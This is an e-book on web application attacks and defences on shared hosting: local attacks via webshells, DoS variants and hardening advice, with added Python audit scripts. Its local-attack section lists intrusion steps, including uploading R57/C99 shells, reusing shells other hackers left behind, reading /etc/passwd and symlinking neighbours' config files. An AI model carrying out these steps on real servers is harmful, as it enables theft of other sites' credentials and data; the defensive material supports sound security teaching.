
[E-book] Attacking and defending WEB applications

PREFACE
Along with the development of information technology and computer networking, the Internet has grown ever more diverse and rich. Online services have reached almost every area of social life. The information on the Internet is just as diverse in content and form, and a great deal of it needs stronger protection because of its economic value, its accuracy and its trustworthiness. At the same time, the forms of network sabotage have become more sophisticated and complex. For every system, therefore, security is an essential and extremely important task for the network administrator. Starting from that reality, we will look at the most common attacks in use today and at how to defend against them. By studying a number of attack methods and the ways of securing against them, I hope to make a small contribution to the study of network security problems, in support of learning and research.
1. Reasons for choosing the topic
In recent years Vietnam has developed rapidly, above all in information technology. Web applications in particular are something almost everyone has heard of and worked with. Websites have become commonplace and an important part of everyday life, especially for businesses and companies. At the same time, the security of web applications remains a hard problem for everyone. We will therefore look at web applications and at how they are attacked and secured.
2. Objectives
To help us understand web applications better, together with the threats and the information-security issues we face when working on web applications every day, and to gain a clearer understanding of web attack and defence techniques.
3. Scope
To survey the most common attack techniques in use today, such as SQL Injection, Denial of Service and Local Attack, and the ways of securing against and defending from these common attacks, at the most general level.

TABLE OF CONTENTS

CHAPTER 1 ... 4
OVERVIEW OF WEBSITES, WEBSITE SERVICES AND COMMON SECURITY FLAWS ... 4
1.1. Description of a website and how it works ... 4
1.2. Web-based services and applications ... 5
CHAPTER 2 ... 6
COMMON WEB APPLICATION ATTACKS AND DEFENCES ... 6
2.1. LOCAL ATTACK ... 6
2.1.1. Understanding Local Attack ... 6
2.1.2. How a Local Attack is carried out ... 6
2.1.3. Securing against Local Attack ... 10
2.1.4. Supporting tools ... 14
2.2. Denial of Service attacks ... 15
2.2.1. DoS (Denial of Service) ... 15
2.2.2. DDoS (Distributed Denial of Service) ... 18
2.2.3. Distributed Reflection Denial of Service (DRDoS) ... 30
2.3. SQL Injection ... 32
2.3.1. SQL injection attacks ... 32
2.3.2. Preventing SQL Injection ... 41
2.4. Cross Site Scripting (XSS) ... 46
2.4.1. XSS attacks ... 46
2.4.2. Prevention ... 49
CHAPTER 3 ... 50
DEMO, EVALUATION AND FUTURE DIRECTIONS ... 50
3.1. Demo ... 50

Tav4 Bkav Forum



3.2. Conclusion ... 51
3.2.1. Results achieved ... 51
3.2.2. Limitations ... 52
3.2.3. Future directions for the project ... 52
SUPERVISOR'S COMMENTS ... 54
REVIEWER'S COMMENTS ... 55



CHAPTER 1
OVERVIEW OF WEBSITES, WEBSITE SERVICES AND COMMON SECURITY FLAWS
1.1. Description of a website and how it works
A website is a set of pages on the Internet where information and images about a business and its products and services (or any information at all) are presented so that customers can reach them from anywhere, at any time.
A website is a collection of many pages [web page]. When a business builds a website it is building many pages of information, product catalogues, services and so on. Three basic elements are needed to create a website:
A domain name (domain).
A place to host the website (hosting).
The content of the information pages [web page].
Some basic terms:
A dynamic website is a website with a database, supplied with a website management tool (Admin Tool). Its characteristics are flexibility: information can be updated frequently and the components of the site are easy to manage. This kind of website is usually written in programming languages such as PHP, ASP.NET, JSP, Perl, ..., with the database managed in SQL or MySQL...
A static website is programmed page by page in HTML, like a brochure; it has no database and no tool for managing the information on the site. Static websites are usually designed with software such as FrontPage or Dreamweaver, ... Their content rarely changes, and changing it usually means changing the accompanying text that presents the content.
Today most businesses use dynamic websites; the generation of web technology everyone knows is web 2.0.
- Domain name (domain): the domain name is the address of the website; on the Internet only one such address exists (that is, only one domain name exists). There are two kinds of domain name:
- International domains: domains of the form .com; .net; .org; .biz; .name ...
- Vietnamese domains: domains of the form .vn; .com.vn; .net.vn; .org.vn; .gov.vn; ...
- Website hosting: the website's data must be stored on a computer (a server) that is always running and connected to the Internet. One server can host many websites; if that server has a problem, for example it is switched off at some moment, nobody can reach any of the websites it hosts while the problem lasts.
- Depending on how much data it needs to store, a business can rent an appropriate amount of space for its website [renting host capacity].
- Host capacity: the space where the website's database and files (images, information, ...) are stored, usually measured in MB or GB.
- Bandwidth, or transfer capacity: the total number of MB of data uploaded to or downloaded from the server where the website is placed (download, upload), usually measured in MB per month.
1.2. Web-based services and applications
With today's technology a website is no longer simply a news page serving plain articles. Applications written for the web are no longer called merely part of a website; they are now called web-based software. There is a great deal of software running on the web, such as Google word (word processing), Google spreadsheets (spreadsheets), e-mail, ...
Some advantages of web-based software or applications:
Everyone has a browser, and a browser is all you need to run the software.
The software is always up to date because it runs on the server.
Always available 24/7.
Data is easy to back up regularly.
Accessible any time, anywhere, as long as you have a network connection.
Deployment cost is very low compared with desktop software.
Imagine you have a sales management or work management program at your company. You are not always at the company; with a web-based program you can check in and run things from anywhere, even from just a phone that can run a browser, such as an iPhone, without needing a computer.



CHAPTER 2
COMMON WEB APPLICATION ATTACKS AND DEFENCES
2.1. LOCAL ATTACK
2.1.1. Understanding Local Attack
- Local attack is one of the most common kinds of hack, and not one that is endorsed. On an ordinary web server, when you register an account on some server you are given an account on that server and a directory to manage your site, for example tenserver/tentaikhoancuaban. Likewise another user has an account such as tenserver/taikhoan1. Suppose taikhoan1 is taken over by a hacker: the hacker can then use tricks, scripts and pieces of code to reach across into the directory holding your site, tenserver/taikhoancuaban. In the same way the hacker can attack the sites of other users, obtain admin information, databases and other secrets, or inject malicious code into your site's index page. This form of attack is called Local Attack.
- Most commonly, Local Attack is used to obtain the victim's config information; the hacker then uses that config information, according to their aims, to sabotage the website.
2.1.2. How a Local Attack is carried out
- A Local Attack is carried out in different ways depending on the hacker's approach. Most often hackers use commands that attack the database.
2.1.2.1. Preparation
- First there must be a PHP/ASP/CGI backdoor on the server. There are many kinds of backdoor, the most common being phpRemoteView (usually called remview), R57Shell, CGITelnet, C99, ... These tools are uploaded, usually shells such as R57, C99, ...
- Upload one of these tools to the host (usually the R57 or C99 shells are used, because they are powerful and easy to use).
- To get a host there are several ways:
+ Buy a host (hackers rarely use this way, for many reasons, the basic one being that it costs money, and if the server admin notices the uploaded shell the host gets deleted, ...). With this way the shells should be deleted immediately after the Local is done.
+ Hack a vulnerable site and upload a shell to it (usually the hacker uses SQL Injection to hack a website, take over its admin account and upload shells), or exploit an inclusion flaw.
+ Search for backdoors (go to google.com and search for keywords such as <?phpRemoteView?> or r57Shell ...). With this way most of the shells found belong to other hackers and have not been removed yet; if possible one should upload a shell of one's own.
2.1.2.2. Carrying out the attack
- Once the preparation is done, that is, a shell has been uploaded to some server, we start looking for websites on the same server as the one the shell was uploaded to; hackers usually use a Reverse IP lookup on the domain where the shell was uploaded to see the websites on the same server.
- Once the list of websites is found, check them one by one to see which site is vulnerable and can be reached by local.
- Common shell commands for Local Attack:
To see the domain names on the same host:
ls -la /etc/valiases
cd /etc/vdomainaliases; ls -lia
- In the special case where the users on the same host cannot be seen, add && instead:
cd /etc/vdomainaliases && ls -lia
- To find out user names, use the command:
cat /etc/passwd
or
less /etc/passwd
+ To local across to the victim, that is, to another site: for example, if our shell is currently at
/home/abcd/public_html/
then we local across as follows:
dir /home/<user to local to>/public_html
- To find the name of the user to local to, use Reverse IP to get the list of users on the same server. To find out whether a user exists, open a web browser and type: <server IP>/~<user name> (for example 203.166.222.121/~doanchuyennganh). If the browser shows the website's index page, the user exists.



+ View the contents of a file:
cat /home/<user to local to>/public_html/index.php
or, to view a forum's config, use:
ln -s /home/<user to local to>/public_html/forum/includes/config.php doanchuyennganh.txt
where doanchuyennganh.txt is a file we create on our own host in order to read someone else's file! If the commands above cannot be used, the server has disabled that function.
Some more Linux shell commands:
- pwd: prints the current working directory (for example /etc/ssh).
- cd: change directory (for example cd .. goes up one level from the current directory; cd vidu enters the directory vidu).
- ls: list the contents of a directory.
- mkdir: create a new directory (mkdir dir_name).
- touch: create a new file (touch file_name).
- rmdir: remove a directory (rmdir dir_name).
- cp: copy a file or directory (cp source_file destination_file).
- mv: move a file or directory; also used to rename a file or directory (mv old_location new_location or mv old_name new_name).
- rm: remove a file (rm file_name).
- To search for files you can use: find <>: for file names; grep <>: to search for content inside files.
To view a file you can use:
- more <>: display the file page by page.
- cat <>: display the whole file.
- To connect to a remote host, use the ssh command. The syntax is ssh <host_name>.
System management:
- ps: shows the programs currently running (very useful: ps gives an overall view of all programs).
- In the list that ps prints you will see the PID (Process identification). This number is asked for when you want to stop a service or application with the kill command.
- top: works much like Task Manager in Windows. It reports on all system resources, the running processes, the average load, ... The command top -d <delay> sets the refresh interval. You can set any value, from .1 (i.e. 10 milliseconds) to 100 (i.e. 100 seconds) or even larger.
- uptime: shows the system's uptime and the average load over that period, the previous 5 minutes and 15 minutes.



The average load is normally calculated as the percentage of system resources (processor, RAM, disk I/O, network load) in use at a given moment. If the calculated figure is 0.37, 37% of the resources are in use. A larger value such as 2.35 means the system has to wait for some data; in that case it would compute 235% faster without running into any problem. This can differ slightly between distributions.
- free: displays information about system memory.
- ifconfig <interface_name>: view detailed information about the network interfaces; the ethernet interface is usually named eth(). You can set network settings such as the IP address with this command (see man ifconfig). If something is not right you can stop or start the interface with ifconfig <interface_name> up/down.
- passwd: lets you change a password (passwd for the user who owns the password, or another user's name if you are logged in as root).
- useradd: lets you add a new user (see man useradd).
Whatever the distribution, you can use the TAB key to auto-complete a command or file name. This is very useful once you are used to the commands. You can also use the up and down keys to scroll through previously entered commands. You can put several commands on one line; for example, to create three directories on one line, the syntax can be: mkdir dir_1 ; mkdir dir_2 ; mkdir dir_3.
Another interesting thing is pipes. You can feed the output of one command into another. For example, man mkdir | tail prints the last lines of the manual page of the mkdir command.
If at some point you need to log in as the root account (the "super" admin of the system), you can do so temporarily with the su command. The -l option (su -l) also switches the home directory and the commands available to those of the root account. Note that you will be prompted for a password. To exit or close: type exit or logout.
2.1.3. Securing against Local Attack
To limit Local Attack we should chmod in the file manager, move the config.php file, edit the .htaccess file and, above all, back up data regularly.
- Chmod in File Manager:
+ CHMOD the public_html directory to 710 instead of the default 750; this helps protect the structure of your website.
+ Next CHMOD the subdirectories (diendan (http://diendan.doanchuyennganh.com)): CHMOD the diendan directory to 701, then CHMOD the subdirectories inside diendan to 701 as well.
+ CHMOD all files to 404.
With this CHMOD, a shell that is run will certainly show the error:
Not Acceptable An appropriate representation of the requested resource /test.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
The attacker will not be able to view anything.
- In addition, some sites are reached through their own subdomain rather than in the form doanchuyenganh.com/diendan (http://diendan.doanchuyennganh.com); this has several meanings, but from a security point of view it makes a big difference.
+ CHMOD directories to 701 and try never to CHMOD 777; for some unimportant folders you may CHMOD 755 so that their contents display correctly and completely. Note also that some servers support CHMOD 101 on directories; if your server supports it, use it, because this CHMOD is very safe: even the owner cannot see the folder structure, even over FTP. At present only the servers of Eshockhost.net support this.
+ CHMOD files to 604 and never 666; if something needs 666, CHMOD it temporarily for that use and CHMOD it back immediately afterwards. On servers that support CHMOD 404 on files, use that, for example the Eshockhost.net server.
- Change the default structure and names of files that hold important information. If you can, change the database structure too.
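The CHMOD advice above can be turned into a check. The following Python script, added here and not part of the e-book, walks a web root, reports every directory or file that other users on the same server can write to (the 777 and 666 cases) and whether public_html is 710, and can apply the 710/701/604 scheme. The sample public_html it builds in a temporary directory is constructed; skipping symlinks is this example's own precaution against the ln -s trick described in 2.1.2.2.

```python
"""Audit a shared-hosting web root against the permission scheme the section
recommends (public_html 710, subdirectories 701, files 604; never 777 or 666)
and optionally apply it. Added example, not code from the e-book. The sample
public_html is constructed by make_sample_tree(), and the rule that any
"other"-writable entry is a finding is this example's reading of the advice.
"""
import os
import stat
import tempfile

RECOMMENDED_ROOT = 0o710   # public_html itself
RECOMMENDED_DIR = 0o701    # subdirectories
RECOMMENDED_FILE = 0o604   # files


def mode_of(path):
    """Permission bits of a path (e.g. 0o777), without following symlinks."""
    return stat.S_IMODE(os.lstat(path).st_mode)


def entries(root):
    """Yield (path, is_dir) for everything under root, skipping symlinks.

    A symlink planted by a neighbouring account (the ln -s trick from 2.1.2.2)
    must not make the audit or the chmod act on a file outside this web root.
    """
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            p = os.path.join(dirpath, name)
            if not os.path.islink(p):
                yield p, True
        for name in filenames:
            p = os.path.join(dirpath, name)
            if not os.path.islink(p):
                yield p, False


def audit_webroot(root):
    """Return (path, octal_mode, reason) findings for permissions the section warns against.

    Anything writable by "other" is what a webshell in another account on the
    same server needs in order to plant code in this site.
    """
    findings = []
    if mode_of(root) != RECOMMENDED_ROOT:
        findings.append((root, oct(mode_of(root)), "web root not 710"))
    for p, is_dir in entries(root):
        m = mode_of(p)
        if m & stat.S_IWOTH:
            kind = "directory" if is_dir else "file"
            findings.append((p, oct(m), f"{kind} writable by other users"))
    return findings


def harden_webroot(root):
    """Apply the section's scheme and return how many paths were changed."""
    changed = 0
    if mode_of(root) != RECOMMENDED_ROOT:
        os.chmod(root, RECOMMENDED_ROOT)
        changed += 1
    for p, is_dir in entries(root):
        want = RECOMMENDED_DIR if is_dir else RECOMMENDED_FILE
        if mode_of(p) != want:
            os.chmod(p, want)
            changed += 1
    return changed


def make_sample_tree():
    """Constructed public_html showing the weak modes the section warns about."""
    root = os.path.join(tempfile.mkdtemp(), "public_html")
    os.makedirs(os.path.join(root, "forum", "includes"))
    os.makedirs(os.path.join(root, "uploads"))
    config = os.path.join(root, "forum", "includes", "config.php")
    index = os.path.join(root, "index.php")
    with open(config, "w") as fh:
        fh.write("<?php $dbpass = 'constructed'; ?>\n")
    with open(index, "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    os.chmod(root, 0o750)                              # the default the section replaces
    os.chmod(os.path.join(root, "forum"), 0o755)
    os.chmod(os.path.join(root, "forum", "includes"), 0o755)
    os.chmod(os.path.join(root, "uploads"), 0o777)     # world-writable upload directory
    os.chmod(config, 0o666)                            # world-writable config
    os.chmod(index, 0o644)
    return root


if __name__ == "__main__":
    sample = make_sample_tree()
    for path, mode, reason in audit_webroot(sample):
        print(f"{mode:>6} {reason}: {path}")
    print("changed:", harden_webroot(sample), "remaining:", audit_webroot(sample))
```

Run it against a real account by passing the account's public_html path to audit_webroot first and only then to harden_webroot; the audit alone is enough to see which of the 777 and 666 cases the section warns about are present.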
- Preventing local by enabling safe mode (for root):
As we know, for PHP webshells the PHP configuration has options that limit their functionality (especially r57, which bypasses automatically), so the first job of the root account is to update to the latest PHP version and reconfigure php.ini. PHP safe mode is a method for dealing with the security problem on servers that share hosting between many accounts (shared servers). It is a misguided design at the PHP level. Today many people, ISPs in particular, choose to enable safe mode for security.
- Guide to the Security and Safe Mode configuration:
Code:
safe_mode: default "0", changeable under PHP_INI_SYSTEM
safe_mode_gid: default "0", changeable under PHP_INI_SYSTEM
safe_mode_include_dir: default NULL, changeable under PHP_INI_SYSTEM
safe_mode_exec_dir: default "", changeable under PHP_INI_SYSTEM
safe_mode_allowed_env_vars: default "PHP_", changeable under PHP_INI_SYSTEM
safe_mode_protected_env_vars: default "LD_LIBRARY_PATH", changeable under PHP_INI_SYSTEM
open_basedir: default NULL, changeable under PHP_INI_SYSTEM
disable_functions: default "", changeable only in php.ini
disable_classes: default "", changeable only in php.ini
- Here is how to adjust the server configuration to enable safe mode:
In the php.ini file:
change safe_mode = Off to safe_mode = On
- disable_functions should contain the following functions:
PHP Code:
readfile, system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, popen, pclose, set_time_limit, escapeshellcmd, escapeshellarg, dl, curl_exec, parse_ini_file, show_source, ini_alter, virtual, openlog
- Then, for example:
PHP Code:
-rw-rw-r-- 1 doanchuyennganh doanchuyennganh 33 Jul 1 19:20 script.php
-rw-r--r-- 1 root root 1116 May 26 18:01 /etc/passwd
- where script.php contains:
PHP Code:
<?php
readfile('/etc/passwd');
?>
- Result:
PHP Code:
Warning: readfile() has been disabled for security reasons in /docroot/script.php on line 2
- Advantages of enabling safe mode:
- Usually, when a file is uploaded it goes to /tmp/ for users whose privileges are not those of the owner.
- Enabling safe mode has drawbacks for PHP programmers, so the system provides:
PHP Code:
<?php
// Check whether safe mode is on
if( ini_get('safe_mode') ){
// Code for when safe_mode is enabled
}else{
// Code for when safe_mode is disabled
}
?>
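As an added example (not code from the e-book), the following Python script checks a php.ini text for the three settings this section discusses: safe_mode, the disable_functions list given above, and open_basedir. The two ini texts inside it are constructed; the php_version parameter is an assumption of the example, added because safe_mode was removed in PHP 5.4, so on current PHP only disable_functions and open_basedir remain as controls.

```python
"""Check a php.ini against the safe_mode / disable_functions hardening the section
describes for shared hosts. Added example; not code from the e-book. The two ini
texts below are constructed, and the function list is the one the section gives.
safe_mode was removed in PHP 5.4, so for such versions the checker reports None
for it instead of a verdict.
"""

# The functions the section says disable_functions should contain.
DANGEROUS_FUNCTIONS = {
    "readfile", "system", "exec", "shell_exec", "passthru", "pcntl_exec", "putenv",
    "proc_close", "proc_get_status", "proc_nice", "proc_open", "proc_terminate",
    "popen", "pclose", "set_time_limit", "escapeshellcmd", "escapeshellarg", "dl",
    "curl_exec", "parse_ini_file", "show_source", "ini_alter", "virtual", "openlog",
}


def parse_php_ini(text):
    """Minimal php.ini parser: 'key = value' lines, ';' comments, [sections] ignored.

    Values are returned as strings with surrounding quotes stripped; a later
    duplicate key overrides an earlier one, as PHP itself does.
    """
    directives = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # ';' starts a comment in php.ini
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        directives[key.lower()] = value.strip('"').strip("'")
    return directives


def is_on(value):
    """php.ini booleans: On/Yes/True/1 are true, everything else false."""
    return value.strip().lower() in {"on", "yes", "true", "1"}


def check_php_ini(text, php_version=(5, 3)):
    """Return a report dict for the hardening the section asks for.

    - safe_mode: True/False, or None when php_version >= (5, 4) (directive removed).
    - missing_disabled: dangerous functions not listed in disable_functions.
    - open_basedir_set: whether open_basedir confines scripts to a directory.
    """
    d = parse_php_ini(text)
    disabled = {f.strip().lower() for f in d.get("disable_functions", "").split(",") if f.strip()}
    return {
        "safe_mode": None if php_version >= (5, 4) else is_on(d.get("safe_mode", "0")),
        "missing_disabled": sorted(DANGEROUS_FUNCTIONS - disabled),
        "open_basedir_set": bool(d.get("open_basedir")),
    }


# Constructed weak configuration: the defaults the section's table lists.
WEAK_INI = """
[PHP]
safe_mode = Off
disable_functions =
open_basedir =
"""

# Constructed hardened configuration following the section's advice.
HARDENED_INI = """
[PHP]
safe_mode = On
; one line, comma separated, exactly as php.ini expects
disable_functions = readfile,system,exec,shell_exec,passthru,pcntl_exec,putenv,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,popen,pclose,set_time_limit,escapeshellcmd,escapeshellarg,dl,curl_exec,parse_ini_file,show_source,ini_alter,virtual,openlog
open_basedir = "/home/doanchuyennganh/public_html:/tmp"
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, check_php_ini(ini))
```

To check a live server, read its php.ini (php --ini prints the path) and pass the text to check_php_ini with the server's real version tuple; an empty missing_disabled list and open_basedir_set True are the state the section is aiming for.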
- Securing the Apache server:
Now, to explain the importance of Apache:
Client (Hacker using local attack) ------> Shared server
Shared Server --------------------------> Apache
Apache ---------------------------------> PHP/Perl ... processing ...
PHP/Perl (sends result) ----------------> Apache
Apache (sends result) ------------------> Client
So the main permissions are set by Apache and do not depend much on the applications such as PHP/CGI ...
Installing Apache (pw is the FreeBSD user and group management utility):
Code:
pw groupadd apache
pw useradd apache -c "Apache Server" -d /dev/null -g apache -s /sbin/nologin
By default the Apache processes run with the privileges of the user nobody (except the main process, which must run as root) and with the GID of the group nogroup. This can lead to serious security threats: after a successful intrusion, an attacker can gain access to other processes running under the same UID/GID. The optimal solution is therefore to run Apache with a UID/GID from a separate group dedicated to that software alone.
Those used to *nix will be familiar with UID/GID under the topic of "file permissions". Still, this detail deserves a little expansion for readers not yet familiar with UID/GID. The creation of a separate group and user for Apache above has two details to note:
-d /dev/null: does not allow the Apache user to have a $HOME directory like ordinary users
-s /sbin/nologin: does not allow the Apache user to use any shell at all. In some cases -s /bin/true is used instead of nologin; true is a command that executes nothing and is completely harmless.
The reason for denying the Apache user a $HOME directory and any "shell" is that if this Apache account is compromised, the attacker still has no opportunity to reach the system at the level needed for "privilege escalation". On *nix in general the "shell" is the interface between user and system; without a shell there is no opportunity for access. If the setup above gave the Apache user a $HOME and allowed it some shell, it would be worth nothing from the "security" point of view.
Go to http://httpd.apache.org/ and install the latest version (currently 2.2).
Then we should set the permissions of the PHP shell separately, so that it has no right to jump across to other users.
- Chmod in /usr/bin as follows:
-rwxr--r-x root nobody wget
-rwxr-x--- root compiler gcc
- Block compiling with gcc, to stop users compiling ready-made exploits to get root.
In /bin/:
-rwxr-xr-x root root cp
- Likewise for rm, mv, tar, chmod, chown, chgrp...
-rwsr-x--- root wheel su
-rwxr-x--- root root ln
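The two properties the passage singles out (-d /dev/null and -s /sbin/nologin) can be verified from /etc/passwd. The Python script below is an added example, not code from the e-book or from Apache: it parses constructed passwd lines and reports service accounts that still have a login shell, a real home directory or uid 0. The SERVICE_ACCOUNTS set and the list of non-login shells are assumptions of the example.

```python
"""Check /etc/passwd-style entries for the properties the section demands of the
Apache account: home directory /dev/null and no usable login shell (/sbin/nologin
or /bin/true). Added example, not code from the e-book or Apache; the passwd
lines below are constructed and the list of service accounts is an assumption.
"""

# Shells that cannot be used interactively (the section names /sbin/nologin and /bin/true).
NO_LOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/true", "/usr/bin/true",
                   "/bin/false", "/usr/bin/false"}

# Accounts that only run daemons and should never log in (assumption for the demo).
SERVICE_ACCOUNTS = {"apache", "nobody", "mysql"}


def parse_passwd(text):
    """Parse passwd lines (name:pw:uid:gid:gecos:home:shell); malformed lines are skipped."""
    users = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            continue
        name, _pw, uid, gid, _gecos, home, shell = fields
        users.append({"name": name, "uid": int(uid), "gid": int(gid), "home": home, "shell": shell})
    return users


def check_service_accounts(text, service_accounts=SERVICE_ACCOUNTS):
    """Return {account: [problems]} for service accounts that violate the section's rules.

    Three rules are applied: the shell must be one that cannot log in, the home
    directory must be /dev/null, and the account must not be uid 0.
    """
    problems = {}
    for u in parse_passwd(text):
        if u["name"] not in service_accounts:
            continue
        issues = []
        if u["shell"] not in NO_LOGIN_SHELLS:
            issues.append("login shell " + u["shell"])
        if u["home"] != "/dev/null":
            issues.append("home directory " + u["home"])
        if u["uid"] == 0:
            issues.append("uid 0")
        if issues:
            problems[u["name"]] = issues
    return problems


# Constructed sample: apache set up as the section shows; nobody and mysql left weak.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/sh
apache:x:80:80:Apache Server:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/home/nobody:/bin/sh
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
this line is malformed and must be skipped
"""

if __name__ == "__main__":
    for account, issues in check_service_accounts(SAMPLE_PASSWD).items():
        print(account, "->", "; ".join(issues))
```

On a real host, pass the contents of /etc/passwd and the names of the daemon accounts actually in use; an empty result means every daemon account matches the pw useradd line above.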
2.1.4. Supporting tools
- The most common and most used tools for Local Attack are shells. The shells usually used are R57, C99, ...
Figure 1. Screenshot of one kind of shell



2.2. Denial of Service attacks
2.2.1. DoS (Denial of Service)
2.2.1.1. General introduction to DoS:
- DoS (Denial of Service) can be described as the act of preventing the legitimate users of a service from reaching and using that service. It includes flooding the network, breaking the connection to the service, ... with the ultimate aim of making the server unable to respond to service requests from clients. DoS can bring down a single computer, a local network or even a very large network system. In essence, in DoS the attacker consumes a large amount of network resources such as bandwidth, memory, ... and so removes the ability to process service requests from other clients.
2.2.1.2. Attack methods:
+ Sabotage based on the limited or non-recoverable nature of network resources.
- Through connections:
SYN flood attack:
Exploiting the way a TCP/IP connection works, the hacker begins establishing a TCP/IP connection with the target but breaks it off as soon as the SYN and SYN ACK steps are complete, leaving the target in a waiting state (waiting for the ACK from the party that requested the connection) and repeatedly resending SYN ACK to establish it. Another way is to spoof the source IP address of the SYN connection request; as in the case above, the target machine is left waiting because the SYN ACK packets cannot reach their destination, since the source IP address is not real. Hackers can use this method to attack a network with more bandwidth than their own.
- Using the victim's own resources against it:
Land Attack: similar to SYN flood, but the hacker uses the target's own IP as the source IP address in the packet, pushing the target into an endless loop as it tries to establish a connection with itself.
UDP flood attack: the hacker sends UDP echo packets whose source IP address is the loopback port of the target itself, or of a machine on the same network as the target, to the UDP echo port (port 7), setting up an exchange of echo packets between the two machines (or between the target and itself if the target has the loopback port configured). The two machines gradually use up all their bandwidth and obstruct the network resource sharing of the other machines on the network.

- Using up bandwidth:
DDoS (Distributed Denial of Service) attack: this is a very dangerous attack method. The hacker breaks into computer systems, installs remote-control programs and activates them all at the same moment to attack a single target simultaneously. This method can mobilise hundreds or even thousands of computers to join the attack at once (depending on the hacker's prior preparation) and can eat up all of the target's bandwidth in the blink of an eye.
- Using other resources:
The attacker exploits resources the victim needs in order to attack it. Attackers can alter data and repeatedly copy the data the victim needs, overloading the CPU and stalling the data-processing tasks.
- Smurf Attack: this kind of attack needs one very important component, an amplifying network. The hacker uses the address of the target computer to broadcast ICMP echo packets to the whole network. All the machines on the network then send ICMP reply packets to the computer the hacker wants to attack. As a result that computer cannot process such a large amount of traffic in time and is very likely to hang.



- Tear Drop attack: in a packet-switched network, data is split into many packets, each with its own offset value, and they may travel by different routes to the destination. At the destination the data is reassembled as it was, using the offset value of each packet. Exploiting this, the hacker can create many packets with overlapping offset values and send them to the target. As a result the destination machine cannot order these packets and may hang, having used up all of the system's processing capacity.
+ Sabotaging or altering configuration information.
Exploiting insecure configuration (for example routers exchanging update messages without authentication), the attacker changes important information, remotely or directly, so that legitimate users cannot use the service. For example, a hacker can break into the DNS and change its information, so that DNS resolution from domain name to IP goes wrong. As a result, client requests for one domain end up at a different domain.
+ Physical sabotage or modification of hardware.
Using the attacker's own access rights to the devices in the network system to reach and sabotage them (routers, switches, ...).
2.2.1.3. Countermeasures
- DoS can cost a great deal of time and money, so countermeasures are needed:
- The system architecture must be designed sensibly, avoiding excessive interdependence, where a fault in one component brings the whole system down.
- Set passwords to protect important devices and resources.
- Set authentication levels for users as well as for information sources on the network (routing updates between routers should also be set to authenticated mode).
- Build information filtering on routers and firewalls, ... and a protection system against SYN flood.
- Accept only the services that are needed; temporarily stop services that are not yet required or not in use.
- Build a quota and limiting system for users, to prevent a malicious user from using server resources to attack the server itself or other networks and servers.
- Continuously update, study and test to detect security vulnerabilities and fix them promptly.
- Monitor the activity of the system continuously so as to detect abnormal behaviour immediately.
- Build a standby system.
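Section 2.2.1.3 calls for continuous monitoring to catch abnormal activity, and 2.2.1.2 describes what that activity looks like. The Python detector below is an added example, not code from the e-book: it scans a list of packet summaries and raises alerts for the SYN flood, Land, UDP flood and Smurf patterns described above. The packet records, thresholds and time window are constructed for the demonstration; counting per target rather than per source is the design choice that keeps spoofed source addresses from defeating the thresholds.

```python
"""Detect the DoS patterns described in 2.2.1.2 from a stream of packet summaries,
the kind of continuous monitoring 2.2.1.3 asks for: SYN flood (half-open
handshakes piling up at a target), Land attack (source equals destination),
UDP flood spraying many ports at one host, and Smurf (ICMP echo requests aimed at
a broadcast address). Added example, not code from the e-book; the packet records,
thresholds and window are constructed for the demonstration.
"""
from collections import defaultdict

# Record layout: (timestamp_seconds, proto, src_ip, dst_ip, dst_port, flags)
# flags is a frozenset of TCP flag names, or a string for ICMP message types.
SYN_THRESHOLD = 50        # pending handshakes at one target before alerting (assumption)
UDP_PORT_THRESHOLD = 20   # distinct destination ports at one target (assumption)
WINDOW_SECONDS = 10.0     # SYN counter resets when the target sees a gap this long


def detect(records, broadcast_addrs=("192.168.1.255",)):
    """Return a sorted list of (kind, address) alerts.

    Counters are keyed by the target, not the source: a SYN flood or UDP flood
    that spoofs its source addresses (as the section notes attackers do) would
    never cross a per-source threshold, but the target still sees every packet.
    """
    alerts = set()
    pending_syn = defaultdict(int)      # dst -> SYNs not yet completed by an ACK
    window_start = defaultdict(float)   # dst -> start of current counting window
    udp_ports = defaultdict(set)        # dst -> distinct ports hit

    for ts, proto, src, dst, dport, flags in records:
        if src == dst:                  # Land attack: the packet claims to come from its target
            alerts.add(("land", dst))
            continue
        if proto == "tcp":
            if ts - window_start[dst] > WINDOW_SECONDS:
                window_start[dst] = ts
                pending_syn[dst] = 0
            if flags == frozenset({"SYN"}):
                pending_syn[dst] += 1
            elif flags == frozenset({"ACK"}) and pending_syn[dst] > 0:
                pending_syn[dst] -= 1   # third step of the handshake closes one half-open entry
            if pending_syn[dst] >= SYN_THRESHOLD:
                alerts.add(("syn-flood", dst))
        elif proto == "udp":
            udp_ports[dst].add(dport)
            if len(udp_ports[dst]) >= UDP_PORT_THRESHOLD:
                alerts.add(("udp-flood", dst))
        elif proto == "icmp":
            if flags == "echo-request" and dst in broadcast_addrs:
                # every host on the subnet will reply to src, so src is the real victim
                alerts.add(("smurf-victim", src))
    return sorted(alerts)


SYN, ACK = frozenset({"SYN"}), frozenset({"ACK"})


def benign_records():
    """Constructed: one client completing three normal handshakes to a web server."""
    recs = []
    for i in range(3):
        recs.append((1.0 + i, "tcp", "10.0.0.5", "10.0.0.1", 80, SYN))
        recs.append((1.1 + i, "tcp", "10.0.0.5", "10.0.0.1", 80, ACK))
    return recs


def sample_records():
    """Constructed: benign traffic followed by the four attack patterns."""
    recs = benign_records()
    # SYN flood from 60 spoofed sources at one target; no ACK ever follows
    recs += [(5.0 + i * 0.05, "tcp", f"198.51.100.{i}", "10.0.0.1", 80, SYN) for i in range(60)]
    # Land: source address equals destination
    recs.append((9.0, "tcp", "10.0.0.1", "10.0.0.1", 80, SYN))
    # UDP spray across 25 ports of a second host
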